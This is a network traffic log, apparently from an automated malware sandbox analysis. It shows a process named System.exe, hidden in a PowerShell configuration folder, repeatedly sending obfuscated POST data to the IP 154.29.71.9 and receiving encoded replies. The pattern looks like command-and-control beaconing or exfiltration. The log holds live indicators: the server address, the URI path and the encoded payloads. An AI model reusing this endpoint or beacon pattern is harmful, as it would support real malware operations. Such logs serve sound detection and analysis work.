                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:53:00.589939117 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:00.942955017 CET2600OUTData Raw: 5c 59 58 59 5e 5b 5d 57 5b 59 5a 55 50 5e 5b 51 56 56 54 49 52 58 52 5c 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: \YXY^[]W[YZUP^[QVVTIRXR\U[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\:/.:%;:)=?[,3Y/#!.3".)X$B&(Z:?"Y ']/<
                                                                                                    Jan 4, 2025 14:53:01.131340027 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:01.263005018 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:01 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    54192.168.2.449801154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:53:01.388685942 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:01.738874912 CET2600OUTData Raw: 59 5c 58 5b 5b 59 5d 57 5b 59 5a 55 50 50 5b 50 56 50 54 45 52 5f 52 5d 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: Y\X[[Y]W[YZUPP[PVPTER_R]U[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9[;6%9=-_<S$($.3 -8!!W(>(E&#4X-?"Y ']/
                                                                                                    Jan 4, 2025 14:53:01.933495998 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:02.072170973 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:01 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    55192.168.2.449807154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:53:02.198477983 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:02.551393032 CET2600OUTData Raw: 59 58 58 59 5b 5a 58 56 5b 59 5a 55 50 59 5b 53 56 50 54 47 52 5d 52 5d 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: YXXY[ZXV[YZUPY[SVPTGR]R]U[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9X/X62^.=_)-''+8[/!=8#8>(>,D20'."Y ']/
                                                                                                    Jan 4, 2025 14:53:02.736884117 CET25INHTTP/1.1 100 Continue


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    56192.168.2.449813154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:53:02.807952881 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 1876
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:03.162440062 CET1876OUTData Raw: 5c 5a 5d 5b 5e 58 58 57 5b 59 5a 55 50 51 5b 55 56 55 54 43 52 50 52 58 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: \Z][^XXW[YZUPQ[UVUTCRPRXU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9,.X1+.>-(+$+,8U6>'V">4&3(."Y ']/
                                                                                                    Jan 4, 2025 14:53:03.481686115 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:03.610877037 CET349INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:03 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 39 38 0d 0a 0f 11 21 03 32 00 2e 56 25 3e 3c 56 39 3c 0b 1a 3f 20 31 1c 3b 2e 34 11 2b 39 37 14 2e 23 3b 5a 29 38 3a 45 3d 08 33 50 32 3f 30 1e 2a 36 20 51 03 12 27 13 31 29 2a 5b 29 23 2d 5a 3a 10 2f 1f 20 31 20 04 32 29 3e 5d 20 2d 29 14 26 2c 35 51 3e 11 39 1f 39 00 06 07 3a 0d 20 53 3c 2f 23 55 0b 1f 26 0f 27 31 34 52 25 5e 28 59 3c 33 3f 03 29 2a 2b 55 20 3a 2c 12 31 2d 22 5b 27 08 3d 1d 30 57 25 16 27 1d 2a 06 36 07 30 05 31 00 2e 53 2e 01 2d 57 00 3d 59 4c 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 98!2.V%><V9<? 1;.4+97.#;Z)8:E=3P2?0*6 Q'1)*[)#-Z:/ 1 2)>] -)&,5Q>99: S</#U&'14R%^(Y<3?)*+U :,1-"['=0W%'*601.S.-W=YL0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    57192.168.2.449814154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:53:03.317275047 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:03.676393032 CET2600OUTData Raw: 59 5e 58 59 5b 5a 5d 57 5b 59 5a 55 50 5e 5b 56 56 53 54 40 52 5f 52 59 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: Y^XY[Z]W[YZUP^[VVST@R_RYU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9,"&+:Q=[<?>7V38#, .5-#Q68=P>>(&3]-/"Y ']/<
                                                                                                    Jan 4, 2025 14:53:03.911652088 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:04.042299986 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:03 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    58192.168.2.449821154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:53:04.175373077 CET371OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Jan 4, 2025 14:53:04.520190001 CET2600OUTData Raw: 5c 5b 58 5e 5b 55 5d 50 5b 59 5a 55 50 5d 5b 56 56 53 54 49 52 5a 52 50 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: \[X^[U]P[YZUP][VVSTIRZRPU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9Z;-!_2^.P=#(/'X/*V!T!(T(=;134Y:"Y ']/0
                                                                                                    Jan 4, 2025 14:53:04.699496984 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:04.826222897 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:04 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    59192.168.2.449827154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:53:04.960597038 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2596
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:05.316893101 CET2596OUTData Raw: 59 5c 5d 5f 5b 5f 58 53 5b 59 5a 55 50 58 5b 57 56 50 54 43 52 51 52 5f 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: Y\]_[_XS[YZUPX[WVPTCRQR_U[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9;"%^2W*.(^(.;'8?. &6(!5*-7&3#.?"Y ']/4
                                                                                                    Jan 4, 2025 14:53:05.505991936 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:05.640557051 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:05 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    60192.168.2.449837154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:53:06.057854891 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:06.410618067 CET2600OUTData Raw: 5c 59 58 5c 5b 5d 5d 57 5b 59 5a 55 50 50 5b 5b 56 53 54 41 52 59 52 5a 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: \YX\[]]W[YZUPP[[VSTARYRZU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9_,-)1:T>=<+.3R%+ ;3>U"!+!T)-<&#:"Y ']/
                                                                                                    Jan 4, 2025 14:53:06.744714022 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:06.878379107 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:06 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    61192.168.2.449843154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:53:07.015685081 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:07.365376949 CET2600OUTData Raw: 59 59 5d 5f 5b 58 58 57 5b 59 5a 55 50 5c 5b 57 56 55 54 48 52 5c 52 5a 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: YY]_[XXW[YZUP\[WVUTHR\RZU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9Y/:$8=<[+00(?/#&W6=U";:>8B$#X-/"Y ']/4
                                                                                                    Jan 4, 2025 14:53:07.542638063 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:07.676254988 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:07 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    62192.168.2.449849154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:53:07.813824892 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:08.161181927 CET2600OUTData Raw: 5c 5b 5d 58 5b 55 5d 56 5b 59 5a 55 50 51 5b 52 56 53 54 48 52 58 52 5d 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: \[]X[U]V[YZUPQ[RVSTHRXR]U[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9Z/>!1)>$_<>8',_/ > =<6()$C%0;-/"Y ']/
                                                                                                    Jan 4, 2025 14:53:08.335899115 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:08.466866970 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:08 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    63192.168.2.449851154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:53:08.663012028 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 1856
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:09.020194054 CET1856OUTData Raw: 5c 5e 5d 5b 5e 59 5d 51 5b 59 5a 55 50 5d 5b 50 56 52 54 40 52 50 52 5d 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: \^][^Y]Q[YZUP][PVRT@RPR]U[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9,>&%.P=-$_(-R38?,0&P">/V6).;&0$Z-?"Y ']/0
                                                                                                    Jan 4, 2025 14:53:09.182801962 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:09.314203024 CET349INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:09 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 39 38 0d 0a 0f 11 21 03 32 07 3a 51 32 2e 38 54 2d 2f 32 09 28 0e 35 18 3b 2d 38 5d 3f 14 06 04 38 0d 3b 1d 29 06 31 19 2a 1f 0d 57 31 59 23 05 2a 26 20 51 03 12 27 5f 31 00 32 1e 29 0d 36 06 2d 3d 2f 1e 20 31 28 02 25 14 03 01 21 2e 3d 14 31 2f 2a 0e 3e 01 0c 0d 3a 10 06 03 2f 20 3c 1e 28 15 23 55 0b 1f 25 11 24 0f 23 0a 27 38 15 05 29 30 24 5e 3f 14 27 52 23 3a 24 59 32 00 29 00 27 0f 29 51 30 1f 39 59 27 1d 25 5a 35 3e 28 01 27 3a 2e 53 2e 01 2d 57 00 3d 59 4c 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 98!2:Q2.8T-/2(5;-8]?8;)1*W1Y#*& Q'_12)6-=/ 1(%!.=1/*>:/ <(#U%$#'8)0$^?'R#:$Y2)')Q09Y'%Z5>(':.S.-W=YL0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    64192.168.2.449852154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:53:08.740067959 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2596
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:09.098160982 CET2596OUTData Raw: 59 5e 58 5d 5b 5b 58 53 5b 59 5a 55 50 58 5b 50 56 57 54 47 52 5b 52 5f 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: Y^X][[XS[YZUPX[PVWTGR[R_U[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9^/>$81=(Z<-;U3;3/#T5=?U55Q='%#]//"Y ']/(
                                                                                                    Jan 4, 2025 14:53:09.276263952 CET25INHTTP/1.1 100 Continue


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    65192.168.2.449858154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
